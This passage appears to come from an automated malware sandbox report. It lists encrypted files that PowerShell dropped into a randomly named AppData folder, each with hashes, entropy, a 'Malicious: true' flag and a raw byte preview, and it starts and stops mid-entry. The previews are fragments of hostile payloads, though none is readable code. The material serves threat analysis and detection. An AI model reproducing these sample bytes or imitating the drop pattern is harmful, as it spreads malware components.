.d..9...k...S!.%!Z..\|s.#t..K.lU.C.t...."ch.xg.....X..8......U.d.....hga..........Y....U..B.r.j8Yt.2},.rW9...?.(..R..Vp<t....W...R...B..-b.'......V..u....S?.~.9.i.?.\|..l.Z.....6.P.].z3.9>....r.@...>.S..A..M..-..Y.Lmt=5.~s.zU].k.....?O.....n.qj.KQM5`..o.Xf.6..v......3\|\|.P...X.....]..rik....t.ncNB.1....mH.:...,%...p.3...s.p.s.+..P-......*.0....NV.V.E......sN......E..t.d..~ .;...P..A6\ _.FVT. ..2.....<.......~.^:j1B.._.o...]Q....~E.n.;7V.kQd...d......

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\IuEPiQpokBgY.cwVJkRoCDvX Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	192571
Entropy (8bit):	7.9989408414372924
Encrypted:	true
SSDEEP:	3072:aOpMIEHl2+UGyOGcp7S1aSuge/OJZDSDolsU01Pnu6VH1l9L+CGkud57vy1UC896:aOOUGyO5p7S1KNCZDPlHuH1l9K3ku7Cf
MD5:	46375229CD3C071A676B5F2278C0A3E3
SHA1:	1B72DC3478277261086903AA77D27F36FC97FA16
SHA-256:	5BAF73CC1196D434184F0E87105C9CB250F16F79F3F5031A7B493BA411CE06B2
SHA-512:	309BAD4866AE86808BAAC3588FF9B173DDEF814DF33C50B096AEB233E39D69C9648B6052DB9105171D318EF0B68664ACA093E28C515FCB13C285503AEAADA976
Malicious:	true
Reputation:	unknown
Preview:	a.44.V..E......l.....7.hnA.."..v..t.@?..U"z.%.xP.I{...o{#.Yu".G..........D.......J.....~..B.L.xN..Prv..z..?...P6.WK....Z....`k...._...v.6..1.iP..7,g........,.....)K8p0...vQNS..(>e...r....V/...Z..?......>FW.......(.d#n!...o...@3=JnU.u+..j.P..rB..h.\|.&.At........KVUe.8un...\|.+-G.he..xG......\k.&.'.Z"....sJ.m}...H`H......SZH.V..B.....\.7....{f")..S.?..m..+Jnbxx.....Rw;.%.....%.y..fd........O1...f........>....t.P..MI..Z.... ....J_m..y.v.N..xZ..{.a.nK..<C0...A^)...J../\D..6{.[..oD..".<XEz.C.DO...6.o........3.'?........T`........Y.......6...o... =....Z.K.lp..49.S...:.a.N.U..;...../...w..~.}....[.y..V.......{re.v.a.0...JEo..M..B:([./.",...>2.k..9.7U+...b..bB....@I.!F\>v....B.g,.... ...~..\P.5..!.f.....rK.....X.1)e.z..53.M...X. ?..v......F.-....Ix.@3cP.$.O..P.............p...\|.{u..K.m._8,. .:1.k".~.vVs.3..a....',.A..<...j(6z.~..)........l9"Ab.a/..B..z[.}.IMf..A-L...d..%w.).(..T... ..%*.;...... ..'n.<...-.1DU.a.k..!.n..)......H...5.<+[...

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\JMTGHiavKcWDFZebl.nxFXMSPduJKcmpzsfe Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	84235
Entropy (8bit):	7.997948464334105
Encrypted:	true
SSDEEP:	1536:7QvPULxJedvX/cnn6RFGN7LV9XBnK3jTywVhrwNOPC/R2V1Vj/fkj/qqc+I:6Ul6X/uWE5VnyjTxPkgK52NbM/A
MD5:	2BBAD7FFF9A25F0A33A009D032641C81
SHA1:	AFD003F1CC4F9C0B9F69802E4268519E7944ED81
SHA-256:	9877C41DB0E835C20089ADC4ACABEC34D4F0546F9F47F725DABB27B27253E5AF
SHA-512:	5C6642B17894E6A7C06C17ADAF4FD84B45086751F094921A0474B1A1ADF9B31296E95D6A6A3E5678886B58B15A973D58499BC321A0B4608A108964DC462883C0
Malicious:	true
Reputation:	unknown
Preview:	\5......r%......M....1D./.a.?^B.6\|.h8G.XB..^.......&.3....v.~&l..d=.....@..G.U...d.Q.....u....C.{.!Q....z.m..m....[...`....5.g..qjE...^nJ.-....../Z...E......M.BK.'En.c.w$...[.2.7M.\.....Q.x......Y........L.\|...w...'~.....+..(.F.t..V.."X....g.X.X..@.>....e....lM+.k!./....s.&.."..u5.p.".l..B2..i^78....'rQv..X.e........b..A.yi.k..w....w.+s\|...B.c..4......0..(e...KQ.2..`..\..tD....g..........B...fFq.T.ZU...;"u.$..GcOA......M[.~....k.wI.&s........0.......%8.b..........=.JHf..X.M$Go....y..~......1.9..e'mCj.Z.......(.1}..f..^...'...9..G.<..S....:P..h.1C.....S.`...7....Vv....#.P ..X..O..;1.=...^.....c.....>...^...4=.B#\..l...V.}..V[..)4.v.I);...!..{[m.5X..'...j{1YEq..u.O..yC....4.ugu..9;O.$.-..z.Nv..m..~...<.....p..p.%.+&..&.....haD.$V..B<..M.Ai.^ml.a. ....`...S.>.L_.0..?........t......F~..w.....U...<.wQo..\|2H.......c...v.r".w.......P..a@.....h.6.-.w......./....P..l.;=.".\..k....`.j.....1...%7.X.-..fM.....+.*.#.?....u...X.Rw.pK..m$.....

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\JgYfPrvXaNVyLCSwTO.NKCIczoUpFORhAxdYBk Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	175265
Entropy (8bit):	7.998983294610096
Encrypted:	true
SSDEEP:	3072:EXUCe8RmLz7hivEebCsY7ZiD8mwQi4dgnONmKuTUHBpqYTgcT0/e0KL3pglK:E+Lz7sMeWpEDaQi4dgEVNDqYTgw0/lKL
MD5:	0304F4E9815222BCFC78E53DEBD7ADC3
SHA1:	3D3A560C8341459C423AEC0181084653638F862B
SHA-256:	153F9F8D23A0DE21A6E935072EB5E50A3663946B4A6F380125B41E9B73ED1AF6
SHA-512:	381F31D3EA3D53EE2C839DEE2668CDD7F1556A53E5BBB82343B6F7D62FAF9D937C9002E01DB16D9B1A578A6AA024776822574FD6008429F42055EDDD901CABB7
Malicious:	true
Reputation:	unknown
Preview:	i...Zr.........0.\|1...is.,..=7@.......{.t.r,...r..#.....^..p......PB...,.)=...";.1.0]d..gL ...h...!Y..../.......Ek...........l.{."..-t..X0>.'...j5..SZa._b..{.t...p..zw.\.@...j..7.m..V....N..... e....O..!....;g.=....5C.f.o.nv....mk.y....5f.g..u...d"..eCW..wi.-..q......:....]\...33t..`!.?K..8.T<Fx.......X..m....&...2L.3t... ..7".Z...}..C....>.....'$....R....m.P.y...Fx....6.e..x............N..-.w....XI...}v..w.@.y....'./A..{..S.....n.q..0b..4k.K.!=.1.a...-.Vd.Y.....?...^\|i...Ul1M..-...b.?..2}m.?.K.Kh:*.Q..A..33\..........`I.l<F...O.rL.&..sv....!...@.G!-...e...p;N.z....0h..,.K..\\......9._C.{G.{.w.)0h......2P..V..o..%..M..,.w.1S.2+l..u.r<.:.j.E.dQ.....).Y.y..G.$r/k(@&{Kx..O<N.2O...zP.]d.....\|.Ej\|.#+.V8......F.QF...w......xp..ZY...19AH....\|(.6.r.a.G.....j.'e...o.Z...FL..`+B.Eq...a,5j.67..r...#.-V.....t.O._...HEC..#_g-.u.{R.\|U.4@ej..BP.1.......f..[daL.H..........H........+..........^Er..o..........h...fo..."...+....\.....-P.idt.s#.

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\JxnIgcXhPzFlDZtaQs.JhublzTrcLqw Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	77978
Entropy (8bit):	7.997884787394556
Encrypted:	true
SSDEEP:	1536:2w30dDR8/LVNEavGST5LOSPREZ9jleyL8cFixREJn8I2PSdb7u9s2lM:2wkU/L7EaHL1PREZ9jleywsixmCVPSBD
MD5:	28146F6B0891AF2BF4413012C9ADB744
SHA1:	FC81DA20F82952EC652DE5D8830D6BEF082ABE96
SHA-256:	511F7D220F9FCC848360CE17C4135599AF513980077763FCD65F5C7178A1F18E
SHA-512:	33D37E08E08D847ADF01AC7FE27E4AFE1514BB48E384DE9EB3F2EC29141FA40E1A346CC614777821C5E16292F00AADC2F04292EB7B78A8B18328073C0C99FED6
Malicious:	true
Reputation:	unknown
Preview:	e.z.. ..N.A1 .@....;Y.7\|B....j.Wm.M..[....v...PE.8..p-.lL..6......b..../..s`.......?..S..~....!2..1Y3.Ar.....d..7...u.M#...S.R....x.....z...(.fZc/Ry..6VG.o...o8.G....].....7.y....\|)F.J!..^Q...m........./..'W.e.p....S..XX...X..-%.E-.0B...6....\=....s..xB.-0.U...lQB..E8..zR.A....^.....e..D..N..)...X".:d...5.=....r..;B..../,u..w.?...v..../(..n.w.(.Qm..x.Fv..z..6..A.i......m.Q.dca&..w..0...3.T..p.5...H....A..e..Er..[.%.9...X.,....H.....r$.W(...@........9..x.[U....2..@.`.{(;KI5...o6 i.s..WN.?.O..~J......}\|-.&..).....^.F...U...S.[..`.\|...^..(3P... t..[yd..3.~../os?J.....h.y.....3...Td...w.I....X-...Gc.......\|].O.....,I....0-/...l..,.dk..~..pPV..&q[z..ws..b.,<L..C'.a.g..u..R.....Cy.........uB.S....%...\|+h.}...h.o.........^V23m....5..T..m.;.}>W.$....(...%.4.....34h..*.O...J...a.}.I.k. T.ot.w_...#i.{.K.3e.....%^/...tHa.....bD{)... ....7[J.9bW.R..C.C.!j..:....:..e..[......W...`.7r...A .)"X.c.a..N.....#.?...H....8\.M...m.D`....~.....s...\|B:.._.)......

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\KRnUxTrWSBjXJwazZd.ORpCBPWDkyzoNr Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	57805
Entropy (8bit):	7.99644807841601
Encrypted:	true
SSDEEP:	1536:rwXo/kHsE5SWmoU5hZgcBtJB7jAvTB2Xvs:4VN5SCU5hZgcBVPAA/s
MD5:	9F117D3515D1648DABE51D3ADA940C6D
SHA1:	D572E20BAA4F88CB33021797048CBF01C2764169
SHA-256:	3F75B48FCA86BCAE5B1495445D5242385FF11A66F0CB59E56A3041FA6FDFDEC9
SHA-512:	137DF5076303763CEF15EA11C5246F89AEABDD0E93AB7BAB64551EF27B0C8877DCBBA423DC6932F2E50FE43EE5CC5E4D66B85F7C21F9B81B0FF401A14215E82C
Malicious:	true
Reputation:	unknown
Preview:	f..O.5..2..........h.=.a..&i...fX....P.]`us.:.... .).xV\..L"....Y.....P.d......c7&.....@..=..G...J.$yGkLC.A.#....7e....-MH.@...."..p....;..^...~.......2..1^+..tt\.N ..Mu..O..8+....u.*..>X..........]..Rl.yw....Xj....1.U.\...x.7...'pc.."~:..(.V.9%...`..?{....xq@.......o........S1#...C0.d.e...@..7.Q....V.Ek..[..%@.pM%...U.w.5....u.W4.~e-j..'.1....#8..9....3AY......+.. .........o.ec.4N.2..I.w.K.....-cV.....E@..h.......4.Q..Ed0u.....6.,Z..PV.......T..L........~+.u....9.Z...K.k..ZGV.b.p.....{..uiS..aBih.PQ".c....x7...G..>...wzh.Hg...../..M.G......?-.uj+S.r.B..@b>`Y..=..U..;m..4.:.$...5.......id.t. =....n.6k.yN..o...MWc}S<.6.t..7...K-...+.gS.=v]..I..j..qqF..v.`..i:..Bx.."=.)..S..z..i.J..[.=.r....<h-....H..G.G..g-..Z........m..~.+.p...f\......vME4..LcM0..v.......U.j.-.h0.N........9..........(...` .......r...._.=+....I...z..3.....W....w....^....#......%...z..4id...(.,.[.r#t................'_+r..sY({ ]s..s.r..J......d.@...K.HY'......5x..S.s.E..{>{...j:@s

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\KzSqBraGTCYHpyEem.dxOzNjXafvpsLYRrZ Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	150458
Entropy (8bit):	7.998783730881263
Encrypted:	true
SSDEEP:	3072:tqyv7rOMvtxHPbiHgwHHdcJ4J+RFseB2b2XF37zkKs0Q7WUrL00zAMf:tqyjrOgLHPzJ4J6seB2SXRkKlUrg0zl
MD5:	ED78380270C00E69361BA42429D735A5
SHA1:	B51788222E519B50CADA3B58C28F8837E74FB7F2
SHA-256:	ED20F5033E41266826AAAF78B3A8EAB598911A8819E31B704E388A22FBA9744C
SHA-512:	D77B5AE0D7A72C67F54DEA137CCCD6FF28B4D49A46C7F7B404527742CF5809F21B476F5494086356E558758525D229D4253639D52568A8CD03C27312091E9102
Malicious:	true
Reputation:	unknown
Preview:	g....-Ed...,.B..s7[.....z..x.RO.V._..Jt.:cp.X_<.%<.D.O-..[..p.......m.r...A.@G..rR......T.i..9....=s]...+........B...v.P...x,..T\|.."^..-.E.aRU..;b......$...P.a.2...0.....-.yHm...B..b....[m?. L....}....]D.....Q......=....n3o..flJ.`..E,.....+x...w.4/].dY....Q.+k..#..... w.'....F..8.t..'..s..^Y.g...X...=LR2...:.U..P..&m..7MT..$....;..7......R.fo..q..8P..\|.d.......CMd.}x..d..}.g....i.^8N+.....p.8."!f..0...U...2FQuW.E....s.V..M.DqD.].T..r+.,..q.x...e>.P..G..Q.......x...)q....V.."R$......5../!lUqs....;.k<.!3i....m..........P}.4y\|.."..O.9f.`..u....pl&..R..^A\|.l5.u...V.8y..L...]~...UU..f...m+.......3......Z.&zr. 2G:.....!a4..u....F..M)2...y........."p.e..V.Qvp5x.foQ..y.P.h..f....P.$p.8....J\|HD..6<g.l....\|}.0..5.o........).%... 0..r.B.R.j........_J.@.N..p..\.2..T....uT.^.....FDW...e...7......,.....j....3...{.....{.V+..[.\|..T]HI...Ct.}...}.K..]Dw......s.O7A.3...p.8.}...G..1,.(..x.*.s....._)I)=.d...."0.[.jB.?.1.zTs.Vy.s......3.....Ujo..U.f.......6.

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\LQseJUBkYz.pFOuCVwicoZavsR Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	193747
Entropy (8bit):	7.998953618658511
Encrypted:	true
SSDEEP:	3072:0w4r1rQYc9VNuen11nCKijYXJOlPIeS12a0Y4Hd7+oQXoC51k3TQK32pnav4TCrt:k2LtXCziejZHd7h4jk3RGpaww+4
MD5:	722180C86F547399CD01325AB13B2224
SHA1:	020E3573389808BB614C3DF34A479B7C51114674
SHA-256:	95B4662F2FFBCC3777D67A6BE016A6BD76402E8A5DE11D5D68BDE3B305DA31AA
SHA-512:	D5D74AEF2E48156D5ACAA86B8E5B896D3E4D0CEC8379E8D791B86895FC97C7E6C939F3DA210A8B105BE00DD3438C49802E67C0D12528741C538E42BDF7B33569
Malicious:	true
Reputation:	unknown
Preview:	.8..~..7...}o..rj.d....@......$..O......%.......u.+.....6vZ..#X......f.cPZ.\.6..{R.<....?5v.(...N`.kS.LS.A.[$...........1.......v...O..W..+.AO.).k8E.$."..y....;....n.........Cg./.1.v[,...c..iz...iz%..f.g.s.?m.G.."VJ....{..K4..I..z26.=...#Hp.I.Wc.,..S...~.>.t$.Z._...?..;.h.s...5.&.4...z..K4P:xk..d-.w.O7..axr.uc.B..p.FO...g.d.q.Gx...m.e....`C..Q5.+K........{...+...h.J..Ge6.j..,......h...F5..5..R.i.@d..1@?.hU0</.....s.....5...).Tx.h.D6.lhS.n....(...\|Q....3..>'..tY.i..F.pE1.[/.d5?:..>....9.9.G...:!.p....../M...>.5C...=.T6...w.k6..1-M3.. 4..iV.[..\U.z`.b;.S..[>.......8...l...)..yA....f..^....FQm...eY....^^P.n\|....g#SE... ....r\|.I...'...l.j......Y..M.....!......2.....9L..9...C$@m..62[O..........CP...{.F.gA\|v...q..Z..q...P..#..A.)........`AM..$)l...._.7.[....~;...E^x.x....'{.Z.."....fr..Gu.........u.....4..f..[...T...0W..Q..v....8.....r...f....!f.S^:E.0....A.....]%Y%..O..`...o.{.....c....H.....Y..@.9.ml..UZ...\|.&1.S.y.m_.".9....;.K..

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\LSypsfMjuHPWV.QNmGCKxUusfy Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	DOS executable (COM)
Category:	dropped
Size (bytes):	104954
Entropy (8bit):	7.998113099391988
Encrypted:	true
SSDEEP:	3072:6bxcthvIS2+LWWh4W0A4Ve1/eMjN6LMvyXfa5:actySvLLC5A4gzjBCQ
MD5:	6D38C52A0C0462962784705CF5587516
SHA1:	5DFCABFEB293863611C067D027C1F3DF16E0B486
SHA-256:	331D20A822234A6B4513FF882B6B5D4705147BEE041B56B6DD6808693A7DA300
SHA-512:	A36363CAC0E84251FA0F56F66D980DDC42A5E8CE2D5BC5C0F2962020F9A235AF863BE0CAB08C8BB3E0AFF292D5FDA161F5D9ADE571BBEBAEB40F25A2640200DF
Malicious:	true
Reputation:	unknown
Preview:	....u.T..C...9g!.x3...=..M....u....I.........iC%7..$....(.s..+7..\|.y>..x.<1.xQ..^....B..l.:...u#..Q...X.a.......I.F...........fQ..uX....w.Dr.3P...a..{..I[.jy:.d(...d<p...a=_.{.....4....>9"..p..._.?s..7...B...././...sz.7.L..Q'./.m.".K...Q.Y..2A..:.KK.uu..) G....]..Y.Q.)....3r..."..a.....Sh...[.....s.GG.y.....t%..L.. . ...{........... .4.a.. 6...B.zR.&C.sq."........l.L.n'.....`#r.M.].o.O.Hv...yyq...=.K...X...].bPR.g......v..qy^g..4...y..~.....*=&e.w.. .G..K.."E...-TQ...j.D]Mp.K.T...;..t.`...v....T..Hv........./.....$y.].....t.v.8bl._[.0......p....=0.w..._..g.%N..(........YI2^...8......V[....3....).[;.Z9..y-vW..#...4$......%/.W.g..S..G...).N. .t.........cqZJ..Rn..jrS.}0.a...2.8.RWs...........Mg...lK0..o....?............a.1...NV..b.'.-....5.....R..O..u.=...;\|_..^k..Kvg.....o...0.}W...Xqv..D...cP3-.LqW<..I.G..pL.l...5{..d5.......)>......./......S.n..,L."%y...;.G.#.`.._zm!..\|...5EZ......]..X...q[.l&....D.},.=.D...\..&.a.V........Z.J@..t.6

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\LoiyfTFKdXhmGbapI.NldCrYQkRM Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	52054
Entropy (8bit):	7.996736116123591
Encrypted:	true
SSDEEP:	1536:PYFY1n/kw/JJw7mhKYiAH3G6cxdV/6auezfNuYhd:PYWl/kmwa51zcDV/14Yz
MD5:	551F8460B871DA96403A70CF884F358A
SHA1:	407304987606199F373B474F29AA69081A72190A
SHA-256:	77A97B0E9B1C700EE74F8B43082E4DC2D285864029839606D70968313DCFCED3
SHA-512:	0DD535E29557D2BD3C1297667B597AAE72580BB4C753545FA5C079EB41FFB970BDE40A30CEF928184703FA0107FEF41B96F14A8BE484B780D7CEC7669646502E
Malicious:	true
Reputation:	unknown
Preview:	............t...I..JB......."....eKei&.;f8. I.....A.P.$&.....^....%./.#.dw.=..~;...JW.A$c.4..N..@Z~.W....\|.<..na./.8.......0.).R(v....H.hl1.;'.(#<;..e........$s...}~n.c.z.D.... ....#k...e.$OZ.G....N..\..m.K.{B..g....Q.w.??..........X-.`.-.#.^>v...9.z..1...+M{N.sHS.ILmo,#.T...!+.O.{~....}5..L$w..o..?.bN...;.."t.S...].\..{r./.....A...02]....+.=M..Kg.L%..l.+...o.W.2.q.P.O.....5`](../4.,..].O`8fb...^`......\....P...(m..h1=J?.H .......;7w.>.w...zw......ps..\; ...R7.;.5..'.9....L.6f..].)...].D..CZR.IU..H.../..._b.FL .og..^..2..!.N.8.8.9o.....0..p"..U<.I..{.l..C:.*...R.6...]...F..g..9..tvN3....-..$\..])...zVo]..S./......&m....M.S.-9..3....F.../...R....h.mM..~....`..^r..j$Sa..o..%...&s..:.;>....s.w..a...j..>.X..v8..G..Q....d....-..E.j.glc.].u.0/....32.{...UV=......,..kp..5........b.....x.8>.b.....^>I...mNp..F..u..{...R.................]....NU40...'...iV.. .n..b......^AD..wp]...p<n}ju...~.....}.....P.>.%9.R...q..&h.7TD..5F..N........I0.D;..&.G2.5..

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\LpsrUIEbMNhHu.cNRBMkGIvhsTS Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	156617
Entropy (8bit):	7.9988397691465165
Encrypted:	true
SSDEEP:	3072:9b6fUfxHn2xoTBe36JTwy5Jt4UWaRqDqunI7oItf:9ucfxHlTBeyTwSJuUWwqDqykr9
MD5:	8C82A814B71B7B3B378291FB02C2217A
SHA1:	B7124706C311D2384EDDA21FD27522164EFDE7A3
SHA-256:	E0B87E5F36BD12B3C76F6C87C22D93AF738623F6EFC6AD4E9E7EA9BD432716DA
SHA-512:	627ABFBAA3A8DB9D1EAD8C571C213FE8977D8D39D67FD79F2836D50B599BC3A585F56EDA23FAFE25C5B1B0CDF8E091D92E13DB940E084BDF0A1DB9144D5BEDA6
Malicious:	true
Reputation:	unknown
Preview:	.~...wj\...c.I.;.........m,\|..$r`...G(....Zsz%....6...8.)..J.g.a......._yHCD..T.F...e.\|..!..-D..".C.....q....N.F!Cs..........K.1Z......`...a9...y...D.i+..L...%.Q.Z.........]9%?...@f.j./.y.......ws...u.\|E.S....u....."be.y..$]_J..f..D.d.\....Q9....P)I....V[.H..W...(..6....3...w.p<?....."..f?mv`.......#k.....~......3,.y....n....ix6%..A..Ul..}Q.H.9[..8.s.....8.5.X....>gT.i..!L..P5-y@..6.?7a.V.!$..U...6..~...."c....b.@.X(..L.G....52UA..q,.i;.j>....FL.........O7....1p..7..%....}.&...Q. x.v..d.1.q.Q.....[..:.,h..+.....G..mYM.,&+...$...0>,Is...0......b.!h[.....Am...O..y..R...)G..x.;.L.>.=.Q7I1..)o.E..V..].m..~...t..6..'Y.!#..H......3.<;,.=.h.w4..4....w.....[E....!...z.z..^fK.L....\..wQ..]...A,.....[..9.5....P....I.;.^)$.\..9\| .X0.......A3....Ld..o..7...g.z..\| e.....:....O....<..g.x....=..RH....n...EH.^.a....M.....Y...3c.kd.....B.....y..1.3..._kC~........Y....wQ.>z8/.w$0.a.J.y..B..........R.N..\.....%....m........DH.jA....:..<Jt.Wr....

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\NQaTsHuKpLcfEkw.qXIGPwJZRUnvW Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	106278
Entropy (8bit):	7.99852769213866
Encrypted:	true
SSDEEP:	1536:j+6tq9kacEFFfKrDYs4VGdA1ScH4kRVGyx3mAdNFNXnLKx/UjWXXVDpliR9O0zNm:y6tjacEDfKr0r17YkEAffKxsDR9lNVIZ
MD5:	34D3F649F0644DDF7749A176A88D04A2
SHA1:	B0C3A1AF600747995ABDACC81FE1B9D14B6066A6
SHA-256:	925137F647231A204EB57A06777CE89F5A2546B2636ABEBB6CF4B620F0B1003F
SHA-512:	5F14AFC740E7F650A3B4D66DA1D3D753726D20222BF72AD14452A2E42F3F8CAF388B616E4258D860E8CE0396D2F73517A3310B3ED9F73E101B078A9533331167
Malicious:	true
Reputation:	unknown
Preview:	\}.Bh.".i.cEv.:.......1.;?J<3...f/.v.Q5..L.I.R...<.t...fZ-..5.io.l....[o..<..q.q6Dr(a..:..X.\r.c=....1..u.+.....gZ.u@.9..P....B\.M....iD.[...._........H...x...D...,..U.1...nM.....)..P..#...h...go.1. .o...8J_....<.F..2.e.I....1.'.g./......;lr..X..f)....V...V....p.W..[#P,)G....D+...L..t...#..?"....Y.C..HW]...+..N5#....e.,.9..A.....-......{...a.E......-...@.....Y....!.mrJ!.>M..1y....Z..@Nh_Q....x..Xu.b.....a}.[...W.l......6.5NJ.......>N......Z.2..^d.m]t..H..2"...V.4}..3...>......ntnCA$dy.&.at..k..>..0...d..>.... K..w.....42..E....O..C.d..^...^T..X..&.#_j..V..Tgb.Dk.PO$.._8.F.aE.0). z<..r.......i.l...(.2....Zw.*.A../m[..mb..T..X..S.5.z..p..d.V{L.....B.-....30.......O%..)\|.X..}.1W..PZ.?=.iu?..c@A....P.9W.fb.....8e1.}..r.O.D.,..s..`..i..#..J.GG..~&.......9K...=1b.....'......KL.'A((.L.n.....%...G.3".H..X....C\|..f..9H~.@RG.........A.q)&.no.K......b.5=.....^w...$..."........1.c....^<~.....#Q...rR.N....u....E....v.:.0...4z..w."...$....^}..H.

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\NzgXIrwMfQPoJWFakOu.ebBSyrmFCOhwR Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	139836
Entropy (8bit):	7.998802712123073
Encrypted:	true
SSDEEP:	3072:EGBh7WH1EHzzS7WpmLqoArOMqlM5LdV+3PZUcu486zJ26:HBFWmHvh8LYqI5xVKPnuZ6zd
MD5:	C1B353FE9C1A3159EC8AEC4F4EADDAF2
SHA1:	55CFCA871E14F144FD3B70A378E792BF9BB707D2
SHA-256:	05BE25BD77DFFA96CC4C207B17FB776CC649B729FC13DB6D9A2DAD1FFBB200D3
SHA-512:	E3FC25357D6B7FC4B17468471CB3B0F0387C658E3A7692476F56C206B215490721D5E4B22535A9E3D9D59B5BC07C059E7AE35E94C76D66149B379D0E1345E6BC
Malicious:	true
Reputation:	unknown
Preview:	...p.}.Y.Y...aG.>.........\......p.c.^.DbMq...o.WywN3..N..e.. p..+j.r]...^@@3.B._n....{...B..ik~....\..A...#.........(....d.E..o.e..p..x1m.{.....\|.L.%\|...9fL&.[hG_t.Trz..dC...(.F.[...(.....U.&q\.j.'@..N.J.R....3.A}.k....L.is..j]...G.Z.;.~I.j."V...R}...O?...:#.?Agh..C....8.I....$...%']..Y.Z.D%@C...p{......9....].^.?....WB..[..1$..JS.N..D. ..z...'{...s..rW..ea.;I.4......K.R].B...I...d..k....t.Y......I'..V3g.TY......^1..5...l.@..c=?h..yjxZ..E..Z.i....v.RC...g..%....I.qHM;...1.6.i?....Y.P...,..L.. CJ.5U.......HmP.....;...H...il.h%...W../G.m.....Sf.....x......v.u"xL....W.A.14Y....j2..u+2J#.;O....fF.8.?.B.=OG..#3.....!.D....m.....N.+]..8..q...."...bD`P...%p..C."...f...E......K.....<...g.h.?...Cu..j.gy.R...!......j.W.`b&........_.).....E...]..X^....,.......a..{......lBl.~.`...a....!..U.I......&.K..FL.Y..3..u....T..4P"...o..x...}a....V.".....9.+Nm.._M$.8.)D....Ot.+..V-......5.X*f....}.@,.r;.}......\|..V.......V\m..0`tD.)i.T....o.Y^..

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\ObfWeiFngl.HvgPwoQmBjUpTdifVGI Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	76053
Entropy (8bit):	7.997779308840478
Encrypted:	true
SSDEEP:	1536:YRvjoJs8e3Ez40ORA3LfQzo8X7VruTQsciPpIsh5QWLcPbu5t:YRvv8sIPORYLCBiTYeFQWLGIt
MD5:	27D08CAB8E369440C57EB61EF1A34A75
SHA1:	5514048074F0AC9820778BDBB9E8B22684780976
SHA-256:	4979939F3A8FAE23D5ADD0C0FC5E217071A081F2D3A34280A4C2162762C2EFDA
SHA-512:	A7941179A62E3C0A248CFE14A66B5E6695B434AC9CA23B3A83742E12E3CCF7C42FAD56B3BC79896BC8D0902770BD4EABA7520D6A53CB8BB74D9CC7B616E7286A
Malicious:	true
Reputation:	unknown
Preview:	l.e\.x......h..s9f.......&GB..;..c_......w.a..E....l9...N.0.'DzY.. S.`...6...N-..2.e.F.c.7bl...HX...n.....{..]..n...k.M..L.dxz..S\3.J...BK....^.O\|wT.O...T..7...dN..#..Ki^....qX.(..Ef........>....,r......eV..b.....I..V......IT..s..8<.....M..0T0.i..D...H_.I.....&f.....l....nS.....Xo.....''<....R.........u.T.o.]I......wa...ee.Z....[p2..Tr..........a.0G....o.Zyh.x..R....2...K/.P.L$Q..,wJ0?.R..GT.=.%...G..k.#.).bT:........9.]1k.,+..S...>.Z.)...<..........T..........r..uIj./T&...o2...cUhC,..%2d.t!ZM^a.E.....L..w...>C.>W.GD....g.V....Z....=i=.....$..T#...^..}..3.j.....w?).U.8....K...]:p.....<..JP4.2.~....0.&..Y.9....,.,..h~........F........]g...\.......g._.9..v....s.K.......b....j(.W..Q.4.......@.........z.....>...z..).3..%......:.._Q...0e.d{p.w.>:....>.YS ..-..N)TG.O\|..n4...CPRk.(.....~c.~\|.]..^#g...-i.....a..x....A5#.y...\. .,................h..2w.....20...4.......8.I4.\1..U.&J.W..n..S"/..9...4I;....n#.@....../.d4.a^'..r...b.n.

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\OkdgDRzXGLTKxQcnr.ZeAYyzqFLjw Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	118190
Entropy (8bit):	7.998313006242623
Encrypted:	true
SSDEEP:	3072:6snO6lP/vMy1zN/Vei2mh5MncynV5S01lVCwKyuZoeGBncLL:6sOG/EAzN/L2m5snVXrKyuGWLL
MD5:	02F70DAEAA14A457EF0EA02D32524FAB
SHA1:	6D6D21C6F570BFFDEE995994AF30306D98B12668
SHA-256:	0E3F7A07DC5407650F45F7FDEABC5A0B1E63689CF39A33BCEF8F23D6AE33DD98
